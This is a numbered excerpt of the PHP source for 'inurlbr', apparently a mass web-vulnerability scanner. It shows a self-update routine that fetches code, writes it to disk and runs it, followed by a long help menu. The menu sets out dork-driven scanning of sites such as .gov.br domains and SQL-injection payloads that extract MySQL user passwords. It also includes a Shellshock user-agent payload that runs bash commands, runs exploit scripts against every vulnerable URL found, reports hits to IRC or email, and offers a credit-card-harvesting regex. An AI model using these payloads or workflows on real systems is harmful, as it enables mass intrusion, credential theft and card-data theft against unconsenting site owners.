  518. $varf = fopen('inurlbr.php', 'a');
  519. fwrite($varf, $resultado['corpo']);
  520. fclose($varf);
  521. chmod('inurlbr.php', 0777);
  522. echo "\nUPDATE DONE WITH SUCCESS!\n";
  523. sleep(3);
  524. system("chmod +x inurlbr.php | php inurlbr.php");
  525. exit();
  526. } else {
  527.  
  528. echo system("command clear") . __bannerLogo();
  529. echo "{$_SESSION["c1"]}__[ x ] {$_SESSION["c16"]}FAILURE TO SERVER!\n{$_SESSION["c0"]}";
  530. }
  531. }
  532. }
  533.  
  534. ################################################################################
  535. #SECURITIES VALIDATION DOUBLE#####################################################
  536. ################################################################################
  537.  
  538. function not_isnull_empty($valor = NULL) {
  539.  
  540. RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
  541. }
  542.  
  543. ################################################################################
  544. #MENU###########################################################################
  545. ################################################################################
  546.  
  547. function __menu() {
  548.  
  549. return system("command clear") . __getOut(__extra() . "
  550. {$_SESSION["c1"]}_ _ ______ _ _____
  551. | | | | ____| | | __ \
  552. | |__| | |__ | | | |__) |
  553. | __ | __| | | | ___/
  554. | | | | |____| |____| |
  555. |_| |_|______|______|_|
  556.  
  557. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current PHP version=>[ {$_SESSION["c1"]}" . phpversion() . "{$_SESSION["c0"]} ]
  558. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current script owner=>[ {$_SESSION["c1"]}" . get_current_user() . "{$_SESSION["c0"]} ]
  559. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current uname=>[ {$_SESSION["c1"]}" . php_uname() . "{$_SESSION["c0"]} ]
  560. {$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current pwd =>[ {$_SESSION["c1"]}" . getcwd() . "{$_SESSION["c0"]} ]
  561. " . $_SESSION['config']['line'] . "
  562.  
  563. {$_SESSION["c1"]}-h{$_SESSION["c0"]}
  564. {$_SESSION["c1"]}--help{$_SESSION["c0"]} Alternative long length help command.
  565. {$_SESSION["c1"]}--ajuda{$_SESSION["c0"]} Command to specify Help.
  566. {$_SESSION["c1"]}--info{$_SESSION["c0"]} Information script.
  567. {$_SESSION["c1"]}--update{$_SESSION["c0"]} Code update.
  568. {$_SESSION["c1"]}-q{$_SESSION["c0"]} Choose which search engine you want through [{$_SESSION["c2"]}1...24{$_SESSION["c0"]}] / [{$_SESSION["c2"]}e1..6{$_SESSION["c0"]}]]:
  569. [options]:
  570. {$_SESSION["c1"]}1{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE / (CSE) GENERIC RANDOM / API
  571. {$_SESSION["c1"]}2{$_SESSION["c0"]} - {$_SESSION["c2"]}BING
  572. {$_SESSION["c1"]}3{$_SESSION["c0"]} - {$_SESSION["c2"]}YAHOO BR
  573. {$_SESSION["c1"]}4{$_SESSION["c0"]} - {$_SESSION["c2"]}ASK
  574. {$_SESSION["c1"]}5{$_SESSION["c0"]} - {$_SESSION["c2"]}HAO123 BR
  575. {$_SESSION["c1"]}6{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE (API)
  576. {$_SESSION["c1"]}7{$_SESSION["c0"]} - {$_SESSION["c2"]}LYCOS
  577. {$_SESSION["c1"]}8{$_SESSION["c0"]} - {$_SESSION["c2"]}UOL BR
  578. {$_SESSION["c1"]}9{$_SESSION["c0"]} - {$_SESSION["c2"]}YAHOO US
  579. {$_SESSION["c1"]}10{$_SESSION["c0"]} - {$_SESSION["c2"]}SAPO
  580. {$_SESSION["c1"]}11{$_SESSION["c0"]} - {$_SESSION["c2"]}DMOZ
  581. {$_SESSION["c1"]}12{$_SESSION["c0"]} - {$_SESSION["c2"]}GIGABLAST
  582. {$_SESSION["c1"]}13{$_SESSION["c0"]} - {$_SESSION["c2"]}NEVER
  583. {$_SESSION["c1"]}14{$_SESSION["c0"]} - {$_SESSION["c2"]}BAIDU BR
  584. {$_SESSION["c1"]}15{$_SESSION["c0"]} - {$_SESSION["c2"]}YANDEX
  585. {$_SESSION["c1"]}16{$_SESSION["c0"]} - {$_SESSION["c2"]}ZOO
  586. {$_SESSION["c1"]}17{$_SESSION["c0"]} - {$_SESSION["c2"]}HOTBOT
  587. {$_SESSION["c1"]}18{$_SESSION["c0"]} - {$_SESSION["c2"]}ZHONGSOU
  588. {$_SESSION["c1"]}19{$_SESSION["c0"]} - {$_SESSION["c2"]}HKSEARCH
  589. {$_SESSION["c1"]}20{$_SESSION["c0"]} - {$_SESSION["c2"]}EZILION
  590. {$_SESSION["c1"]}21{$_SESSION["c0"]} - {$_SESSION["c2"]}SOGOU
  591. {$_SESSION["c1"]}22{$_SESSION["c0"]} - {$_SESSION["c2"]}DUCK DUCK GO
  592. {$_SESSION["c1"]}23{$_SESSION["c0"]} - {$_SESSION["c2"]}BOOROW
  593. {$_SESSION["c1"]}24{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE(CSE) GENERIC RANDOM
  594. ----------------------------------------
  595. SPECIAL MOTORS
  596. ----------------------------------------
  597. {$_SESSION["c1"]}e1{$_SESSION["c0"]} - {$_SESSION["c2"]}TOR FIND
  598. {$_SESSION["c1"]}e2{$_SESSION["c0"]} - {$_SESSION["c2"]}ELEPHANT
  599. {$_SESSION["c1"]}e3{$_SESSION["c0"]} - {$_SESSION["c2"]}TORSEARCH
  600. {$_SESSION["c1"]}e4{$_SESSION["c0"]} - {$_SESSION["c2"]}WIKILEAKS
  601. {$_SESSION["c1"]}e5{$_SESSION["c0"]} - {$_SESSION["c2"]}OTN
  602. {$_SESSION["c1"]}e6{$_SESSION["c0"]} - {$_SESSION["c2"]}EXPLOITS SHODAN
  603. ----------------------------------------
  604. {$_SESSION["c1"]}all{$_SESSION["c0"]} - {$_SESSION["c2"]}All search engines / not special motors{$_SESSION["c0"]}
  605. Default: {$_SESSION["c1"]}1{$_SESSION["c0"]}
  606. Example: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
  607. Usage: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1{$_SESSION["c0"]}
  608. {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}5{$_SESSION["c0"]}
  609. Using more than one engine: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1,2,5,6,11,24{$_SESSION["c0"]}
  610. Using all engines: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}all{$_SESSION["c0"]}
  611.  
  612. {$_SESSION["c1"]}--proxy{$_SESSION["c0"]} Choose which proxy you want to use through the search engine:
  613. Example: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}{proxy:port}{$_SESSION["c0"]}
  614. Usage: {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}localhost:8118{$_SESSION["c0"]}
  615. {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}socks5://googleinurl@localhost:9050{$_SESSION["c0"]}
  616. {$_SESSION["c1"]}--proxy {$_SESSION["c2"]}http://admin:12334@172.16.0.90:8080{$_SESSION["c0"]}
  617.  
  618. {$_SESSION["c1"]}--proxy-file{$_SESSION["c0"]} Set font file to randomize your proxy to each search engine.
  619. Example: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}{proxys}{$_SESSION["c0"]}
  620. Usage: {$_SESSION["c1"]}--proxy-file {$_SESSION["c2"]}proxys_list.txt{$_SESSION["c0"]}
  621.  
  622. {$_SESSION["c1"]}--time-proxy{$_SESSION["c0"]} Set the time how often the proxy will be exchanged.
  623. Example: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
  624. Usage: {$_SESSION["c1"]}--time-proxy {$_SESSION["c2"]}10{$_SESSION["c0"]}
  625.  
  626. {$_SESSION["c1"]}--proxy-http-file{$_SESSION["c0"]} Set file with urls http proxy,
  627. are used to bular capch search engines
  628. Example: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}{youfilehttp}{$_SESSION["c0"]}
  629. Usage: {$_SESSION["c1"]}--proxy-http-file {$_SESSION["c2"]}http_proxys.txt{$_SESSION["c0"]}
  630.  
  631.  
  632. {$_SESSION["c1"]}--tor-random{$_SESSION["c0"]} Enables the TOR function, each usage links an unique IP.
  633.  
  634. {$_SESSION["c1"]}-t{$_SESSION["c0"]} Choose the validation type: op {$_SESSION["c2"]}1, 2, 3, 4, 5{$_SESSION["c0"]}
  635. [options]:
  636. {$_SESSION["c2"]}1{$_SESSION["c0"]} - The first type uses default errors considering the script:
  637. It establishes connection with the exploit through the get method.
  638. Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  639.  
  640. {$_SESSION["c2"]}2{$_SESSION["c0"]} - The second type tries to valid the error defined by: {$_SESSION["c1"]}-a={$_SESSION["c2"]}'VALUE_INSIDE_THE _TARGET'{$_SESSION["c0"]}
  641. It also establishes connection with the exploit through the get method
  642. Demo: www.alvo.com.br/pasta/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  643.  
  644. {$_SESSION["c2"]}3{$_SESSION["c0"]} - The third type combine both first and second types:
  645. Then, of course, it also establishes connection with the exploit through the get method
  646. Demo: www.target.com.br{$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  647. Default: {$_SESSION["c2"]}1{$_SESSION["c0"]}
  648. Example: {$_SESSION["c1"]}-t {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
  649. Usage: {$_SESSION["c1"]}-t {$_SESSION["c2"]}1{$_SESSION["c0"]}
  650.  
  651. {$_SESSION["c2"]}4{$_SESSION["c0"]} - The fourth type a validation based on source file and will be enabled scanner standard functions.
  652. The source file their values are concatenated with target url.
  653. - Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
  654. - Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  655. Explicative:
  656. Source file values:
  657. /admin/index.php?id=
  658. /pag/index.php?id=
  659. /brazil.php?new=
  660. Demo:
  661. www.target.com.br/admin/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  662. www.target.com.br/pag/index.php?id={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  663. www.target.com.br/brazil.php?new={$_SESSION["c3"]}{exploit}{$_SESSION["c0"]}
  664.  
  665. {$_SESSION["c2"]}5{$_SESSION["c0"]} - (FIND PAGE) The fifth type of validation based on the source file,
  666. Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
  667. - Set your target with command {$_SESSION["c1"]}--target {$_SESSION["c2"]}{http://target}{$_SESSION["c0"]}
  668. - Set your file with command {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  669. Explicative:
  670. Source file values:
  671. /admin/admin.php
  672. /admin.asp
  673. /admin.aspx
  674. Demo:
  675. www.target.com.br/admin/admin.php
  676. www.target.com.br/admin.asp
  677. www.target.com.br/admin.aspx
  678. Observation: If it shows the code 200 will be separated in the output file
  679.  
  680. DEFAULT ERRORS:
  681. {$_SESSION["c11"]}
  682. [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
  683. [*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
  684. [*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
  685. [*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
  686. [*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
  687. [*]ERROR INDEFINITE
  688. {$_SESSION["c0"]}
  689.  
  690. {$_SESSION["c1"]}--dork{$_SESSION["c0"]} Defines which dork the search engine will use.
  691. Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{dork}{$_SESSION["c0"]}
  692. Usage: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'site:.gov.br inurl:php? id'{$_SESSION["c0"]}
  693. - Using multiples dorks:
  694. Example: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}{[DORK]dork1[DORK]dork2[DORK]dork3}{$_SESSION["c0"]}
  695. Usage: {$_SESSION["c1"]}--dork {$_SESSION["c2"]}'[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'{$_SESSION["c0"]}
  696.  
  697. {$_SESSION["c1"]}--dork-file{$_SESSION["c0"]} Set font file with your search dorks.
  698. Example: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}{dork_file}{$_SESSION["c0"]}
  699. Usage: {$_SESSION["c1"]}--dork-file {$_SESSION["c2"]}'dorks.txt'{$_SESSION["c0"]}
  700.  
  701. {$_SESSION["c1"]}--exploit-get{$_SESSION["c0"]} Defines which exploit will be injected through the GET method to each URL found.
  702. Example: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}{exploit_get}{$_SESSION["c0"]}
  703. Usage: {$_SESSION["c1"]}--exploit-get {$_SESSION["c3"]}\"?'´%270x27;\"{$_SESSION["c0"]}
  704.  
  705. {$_SESSION["c1"]}--exploit-post{$_SESSION["c0"]} Defines which exploit will be injected through the POST method to each URL found.
  706. Example: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}{exploit_post}{$_SESSION["c0"]}
  707. Usage: {$_SESSION["c1"]}--exploit-post {$_SESSION["c3"]}'field1=valor1&field2=valor2&field3=?´0x273exploit;&botao=ok'{$_SESSION["c0"]}
  708.  
  709. {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]} Defines which exploit/parameter will be executed in the options: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all{$_SESSION["c0"]}.
  710. The exploit-command will be identified by the paramaters: {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
  711. Ex {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf' {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'curl -v {$_SESSION["c8"]}_TARGET_{$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c2"]}'{$_SESSION["c0"]}
  712. _TARGET_ is the specified URL/TARGET obtained by the process
  713. _EXPLOIT_ is the exploit/parameter defined by the option {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
  714. Example: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}{exploit-command}{$_SESSION["c0"]}
  715. Usage: {$_SESSION["c1"]}--exploit-command {$_SESSION["c2"]}'/admin/config.conf'{$_SESSION["c0"]}
  716.  
  717. {$_SESSION["c1"]}-a{$_SESSION["c0"]} Specify the string that will be used on the search script:
  718. Example: {$_SESSION["c1"]}-a {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
  719. Usage: {$_SESSION["c1"]}-a {$_SESSION["c2"]}'<title>hello world</title>'{$_SESSION["c0"]}
  720.  
  721. {$_SESSION["c1"]}-d{$_SESSION["c0"]} Specify the script usage op {$_SESSION["c2"]}1, 2, 3, 4, 5.{$_SESSION["c0"]}
  722. Example: {$_SESSION["c1"]}-d {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
  723. Usage: {$_SESSION["c1"]}-d {$_SESSION["c2"]}1 {$_SESSION["c0"]}/URL of the search engine.
  724. {$_SESSION["c1"]}-d {$_SESSION["c2"]}2 {$_SESSION["c0"]}/Show all the url.
  725. {$_SESSION["c1"]}-d {$_SESSION["c2"]}3 {$_SESSION["c0"]}/Detailed request of every URL.
  726. {$_SESSION["c1"]}-d {$_SESSION["c2"]}4 {$_SESSION["c0"]}/Shows the HTML of every URL.
  727. {$_SESSION["c1"]}-d {$_SESSION["c2"]}5 {$_SESSION["c0"]}/Detailed request of all URLs.
  728. {$_SESSION["c1"]}-d {$_SESSION["c2"]}6 {$_SESSION["c0"]}/Detailed PING - PONG irc.
  729.  
  730. {$_SESSION["c1"]}-s{$_SESSION["c0"]} Specify the output file where it will be saved the vulnerable URLs.
  731.  
  732. Example: {$_SESSION["c1"]}-s {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  733. Usage: {$_SESSION["c1"]}-s {$_SESSION["c2"]}your_file.txt
  734.  
  735. {$_SESSION["c1"]}-o{$_SESSION["c0"]} Manually manage the vulnerable URLs you want to use from a file, without using a search engine.
  736. Example: {$_SESSION["c1"]}-o {$_SESSION["c2"]}{file_where_my_urls_are}{$_SESSION["c0"]}
  737. Usage: {$_SESSION["c1"]}-o {$_SESSION["c2"]}tests.txt
  738.  
  739. {$_SESSION["c1"]}--persist{$_SESSION["c0"]} Attempts when Google blocks your search.
  740. The script tries to another google host / default = 4
  741. Example: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}{number_attempts}{$_SESSION["c0"]}
  742. Usage: {$_SESSION["c1"]}--persist {$_SESSION["c2"]}7
  743.  
  744. {$_SESSION["c1"]}--ifredirect{$_SESSION["c0"]} Return validation method post REDIRECT_URL
  745. Example: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}{string_validation}{$_SESSION["c0"]}
  746. Usage: {$_SESSION["c1"]}--ifredirect {$_SESSION["c2"]}'/admin/painel.php'
  747.  
  748. {$_SESSION["c1"]}-m{$_SESSION["c0"]} Enable the search for emails on the urls specified.
  749.  
  750. {$_SESSION["c1"]}-u{$_SESSION["c0"]} Enables the search for URL lists on the url specified.
  751.  
  752. {$_SESSION["c1"]}--gc{$_SESSION["c0"]} Enable validation of values ​​with google webcache.
  753.  
  754. {$_SESSION["c1"]}--pr{$_SESSION["c0"]} Progressive scan, used to set operators (dorks),
  755. makes the search of a dork and valid results, then goes a dork at a time.
  756.  
  757. {$_SESSION["c1"]}--file-cookie{$_SESSION["c0"]} Open cookie file.
  758.  
  759. {$_SESSION["c1"]}--save-as{$_SESSION["c0"]} Save results in a certain place.
  760.  
  761. {$_SESSION["c1"]}--shellshock{$_SESSION["c0"]} Explore shellshock vulnerability by setting a malicious user-agent.
  762.  
  763. {$_SESSION["c1"]}--popup{$_SESSION["c0"]} Run --command all or vuln in a parallel terminal.
  764.  
  765. {$_SESSION["c1"]}--cms-check{$_SESSION["c0"]} Enable simple check if the url / target is using CMS.
  766.  
  767. {$_SESSION["c1"]}--no-banner{$_SESSION["c0"]} Remove the script presentation banner.
  768.  
  769. {$_SESSION["c1"]}--unique{$_SESSION["c0"]} Filter results in unique domains.
  770.  
  771. {$_SESSION["c1"]}--beep{$_SESSION["c0"]} Beep sound when a vulnerability is found.
  772.  
  773. {$_SESSION["c1"]}--alexa-rank{$_SESSION["c0"]} Show alexa positioning in the results.
  774.  
  775. {$_SESSION["c1"]}--robots{$_SESSION["c0"]} Show values file robots.
  776.  
  777. {$_SESSION["c1"]}--range{$_SESSION["c0"]} Set range IP.
  778. Example: {$_SESSION["c1"]}--range {$_SESSION["c2"]}{range_start,rage_end}{$_SESSION["c0"]}
  779. Usage: {$_SESSION["c1"]}--range {$_SESSION["c2"]}'172.16.0.5#172.16.0.255'
  780.  
  781. {$_SESSION["c1"]}--range-rand{$_SESSION["c0"]} Set amount of random ips.
  782. Example: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}{rand}{$_SESSION["c0"]}
  783. Usage: {$_SESSION["c1"]}--range-rand {$_SESSION["c2"]}'50'
  784.  
  785. {$_SESSION["c1"]}--irc{$_SESSION["c0"]} Sending vulnerable to IRC / server channel.
  786. Example: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}{server#channel}{$_SESSION["c0"]}
  787. Usage: {$_SESSION["c1"]}--irc {$_SESSION["c2"]}'irc.rizon.net#inurlbrasil'
  788.  
  789. {$_SESSION["c1"]}--http-header{$_SESSION["c0"]} Set HTTP header.
  790. Example: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
  791. Usage: {$_SESSION["c1"]}--http-header {$_SESSION["c2"]}'HTTP/1.1 401 Unauthorized,WWW-Authenticate: Basic realm=\"Top Secret\"'
  792.  
  793. {$_SESSION["c1"]}--sedmail{$_SESSION["c0"]} Sending vulnerable to email.
  794. Example: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}{youemail}{$_SESSION["c0"]}
  795. Usage: {$_SESSION["c1"]}--sedmail {$_SESSION["c2"]}youemail@inurl.com.br
  796.  
  797. {$_SESSION["c1"]}--delay{$_SESSION["c0"]} Delay between research processes.
  798. Example: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
  799. Usage: {$_SESSION["c1"]}--delay {$_SESSION["c2"]}10
  800.  
  801. {$_SESSION["c1"]}--time-out{$_SESSION["c0"]} Timeout to exit the process.
  802. Example: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}{second}{$_SESSION["c0"]}
  803. Usage: {$_SESSION["c1"]}--time-out {$_SESSION["c2"]}10
  804.  
  805. {$_SESSION["c1"]}--ifurl{$_SESSION["c0"]} Filter URLs based on their argument.
  806. Example: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}{ifurl}{$_SESSION["c0"]}
  807. Usage: {$_SESSION["c1"]}--ifurl {$_SESSION["c2"]}index.php?id=
  808.  
  809. {$_SESSION["c1"]}--ifcode{$_SESSION["c0"]} Valid results based on your return http code.
  810. Example: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}{ifcode}{$_SESSION["c0"]}
  811. Usage: {$_SESSION["c1"]}--ifcode {$_SESSION["c2"]}200
  812.  
  813. {$_SESSION["c1"]}--ifemail{$_SESSION["c0"]} Filter E-mails based on their argument.
  814. Example: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}{file_where_my_emails_are}{$_SESSION["c0"]}
  815. Usage: {$_SESSION["c1"]}--ifemail {$_SESSION["c2"]}sp.gov.br
  816.  
  817. {$_SESSION["c1"]}--url-reference{$_SESSION["c0"]} Define referring URL in the request to send him against the target.
  818. Example: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}{url}{$_SESSION["c0"]}
  819. Usage: {$_SESSION["c1"]}--url-reference {$_SESSION["c2"]}http://target.com/admin/user/valid.php
  820.  
  821. {$_SESSION["c1"]}--mp{$_SESSION["c0"]} Limits the number of pages in the search engines.
  822. Example: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}{limit}{$_SESSION["c0"]}
  823. Usage: {$_SESSION["c1"]}--mp {$_SESSION["c2"]}50
  824.  
  825. {$_SESSION["c1"]}--user-agent{$_SESSION["c0"]} Define the user agent used in its request against the target.
  826. Example: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}{agent}{$_SESSION["c0"]}
  827. Usage: {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'
  828. Usage-exploit / SHELLSHOCK:
  829. {$_SESSION["c1"]}--user-agent {$_SESSION["c2"]}'() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"'
  830. Complete command:
  831. php inurlbr.php --dork '_YOU_DORK_' -s shellshock.txt --user-agent '_YOU_AGENT_XPL_SHELLSHOCK' -t 2 -a '99887766555'
  832.  
  833. {$_SESSION["c1"]}--sall{$_SESSION["c0"]} Saves all urls found by the scanner.
  834. Example: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}{file}{$_SESSION["c0"]}
  835. Usage: {$_SESSION["c1"]}--sall {$_SESSION["c2"]}your_file.txt
  836.  
  837. {$_SESSION["c1"]}--command-vul{$_SESSION["c0"]} Every vulnerable URL found will execute this command parameters.
  838. Example: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  839. Usage: {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  840. {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  841. {$_SESSION["c1"]}--command-vul {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  842.  
  843. {$_SESSION["c1"]}--command-all{$_SESSION["c0"]} Use this commmand to specify a single command to EVERY URL found.
  844. Example: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}{command}{$_SESSION["c0"]}
  845. Usage: {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'nmap sV -p 22,80,21 {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]}{$_SESSION["c2"]}'{$_SESSION["c0"]}
  846. {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'./exploit.sh {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} {$_SESSION["c2"]}output.txt'{$_SESSION["c0"]}
  847. {$_SESSION["c1"]}--command-all {$_SESSION["c2"]}'php miniexploit.php -t {$_SESSION["c8"]}_TARGET_{$_SESSION["c2"]} -s output.txt'{$_SESSION["c0"]}
  848. [!] Observation:
  849.  
  850. {$_SESSION["c8"]}_TARGET_{$_SESSION["c0"]} will be replaced by the URL/target found, although if the user
  851. doesn't input the get, only the domain will be executed.
  852.  
  853. {$_SESSION["c14"]}_TARGETFULL_{$_SESSION["c0"]} will be replaced by the original URL / target found.
  854.  
  855. {$_SESSION["c14"]}_TARGETXPL_{$_SESSION["c0"]} will be replaced by the original URL / target found + EXPLOIT --exploit-get.
  856.  
  857. {$_SESSION["c9"]}_TARGETIP_{$_SESSION["c0"]} return of ip URL / target found.
  858.  
  859. {$_SESSION["c8"]}_URI_{$_SESSION["c0"]} Back URL set of folders / target found.
  860.  
  861. {$_SESSION["c15"]}_RANDOM_{$_SESSION["c0"]} Random strings.
  862.  
  863. {$_SESSION["c9"]}_PORT_{$_SESSION["c0"]} Capture port of the current test, within the --port-scan process.
  864.  
  865. {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]} will be replaced by the specified command argument {$_SESSION["c1"]}--exploit-command{$_SESSION["c0"]}.
  866. The exploit-command will be identified by the parameters {$_SESSION["c1"]}--command-vul/{$_SESSION["c0"]} {$_SESSION["c1"]}--command-all as {$_SESSION["c6"]}_EXPLOIT_{$_SESSION["c0"]}
  867.  
  868. {$_SESSION["c1"]}--replace{$_SESSION["c0"]} Replace values ​​in the target URL.
  869. Example: {$_SESSION["c1"]}--replace {$_SESSION["c2"]}{value_old[INURL]value_new}{$_SESSION["c0"]}
  870. Usage: {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.php?id=[INURL]index.php?id=1666+and+(SELECT+user,Password+from+mysql.user+limit+0,1)=1'{$_SESSION["c0"]}
  871. {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'main.php?id=[INURL]main.php?id=1+and+substring(@@version,1,1)=1'{$_SESSION["c0"]}
  872. {$_SESSION["c1"]}--replace {$_SESSION["c2"]}'index.aspx?id=[INURL]index.aspx?id=1%27´'{$_SESSION["c0"]}
  873.  
  874. {$_SESSION["c1"]}--remove{$_SESSION["c0"]} Remove values ​​in the target URL.
  875. Example: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}{string}{$_SESSION["c0"]}
  876. Usage: {$_SESSION["c1"]}--remove {$_SESSION["c2"]}'/admin.php?id=0'
  877.  
  878. {$_SESSION["c1"]}--regexp{$_SESSION["c0"]} Using regular expression to validate his research, the value of the
  879. Expression will be sought within the target/URL.
  880. Example: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
  881. All Major Credit Cards:
  882. Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6011[0-9]{12}|3(?:0[0-5]|[68][0-9])[0-9]{11}|3[47][0-9]{13})'{$_SESSION["c0"]}
  883.  
  884. IP Addresses:
  885. Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))'{$_SESSION["c0"]}
  886.  
  887. EMAIL:
  888. Usage: {$_SESSION["c1"]}--regexp{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
  889.  
  890.  
  891. {$_SESSION["c1"]}---regexp-filter{$_SESSION["c0"]} Using regular expression to filter his research, the value of the
  892. Expression will be sought within the target/URL.
  893. Example: {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} {regular_expression}{$_SESSION["c0"]}
  894. EMAIL:
  895. Usage: {$_SESSION["c1"]}---regexp-filter{$_SESSION["c2"]} '([\w\d\.\-\_]+)@([\w\d\.\_\-]+)'{$_SESSION["c0"]}
  896.  
  897.  
  898. [!] Small commands manager:
  899.  
  900. {$_SESSION["c1"]}--exploit-cad{$_SESSION["c0"]} Command register for use within the scanner.
  901. Format {TYPE_EXPLOIT}::{EXPLOIT_COMMAND}
  902. Example Format: NMAP::nmap -sV _TARGET_
  903. Example Format: EXPLOIT1::php xpl.php -t _TARGET_ -s output.txt
  904. Usage: {$_SESSION["c1"]}--exploit-cad{$_SESSION["c2"]} 'NMAP::nmap -sV _TARGET_'{$_SESSION["c0"]}
  905. Observation: Each registered command is identified by an id of your array.
  906. Commands are logged in exploits.conf file.
  907.  
